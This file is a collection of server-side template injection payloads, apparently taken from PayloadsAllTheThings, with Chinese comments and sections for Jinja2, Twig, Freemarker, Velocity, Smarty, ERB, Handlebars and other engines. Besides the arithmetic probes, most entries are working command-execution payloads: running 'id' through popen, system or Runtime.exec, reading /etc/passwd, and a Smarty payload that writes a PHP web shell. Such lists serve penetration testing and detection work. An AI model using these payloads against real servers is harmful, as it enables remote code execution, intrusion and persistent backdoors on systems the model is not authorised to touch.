# SSTI Detection Payloads
# 来源: PayloadsAllTheThings Server Side Template Injection
# 模板注入检测payload集合

# === 通用检测 (Polyglot) ===
${{<%[%'"}}%\.
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
@(7*7)
{{7*'7'}}
{{config}}
{{self}}
{{request}}
{{settings}}

# === Jinja2 (Python) ===
{{7*7}}
{{7*'7'}}
{{config}}
{{config.items()}}
{{request.environ}}
{{self.__class__.__mro__}}
{{''.__class__.__mro__}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

# === Twig (PHP) ===
{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{'id'|filter('system')}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# === Freemarker (Java) ===
${7*7}
${"freemarker.template.utility.Execute"?new()("id")}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
[#assign ex='freemarker.template.utility.Execute'?new()]${ ex('id')}

# === Velocity (Java) ===
#set($x=7*7)$x
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))

# === Thymeleaf (Java) ===
#{7*7}
${7*7}
${T(java.lang.Runtime).getRuntime().exec('id')}
[[${7*7}]]
[(${7*7})]

# === Smarty (PHP) ===
{7*7}
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

# === Mako (Python) ===
${7*7}
<%import os%>${os.popen('id').read()}
<%import os; x=os.popen('id').read()%>${x}

# === ERB (Ruby) ===
<%= 7*7 %>
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').readlines() %>

# === Pebble (Java) ===
{{ 7*7 }}
{% set cmd = 'id' %}
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec(cmd) }}

# === Jade/Pug (Node.js) ===
#{7*7}
- var x = root.process.mainModule.require('child_process').execSync('id').toString()
#{x}

# === Handlebars (Node.js) ===
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('id');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

# === 数学运算检测 ===
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
@(7*7)
{{7+7}}
${7+7}
<%= 7+7 %>
#{7+7}
{{7-7}}
${7-7}
<%= 7-7 %>
#{7-7}
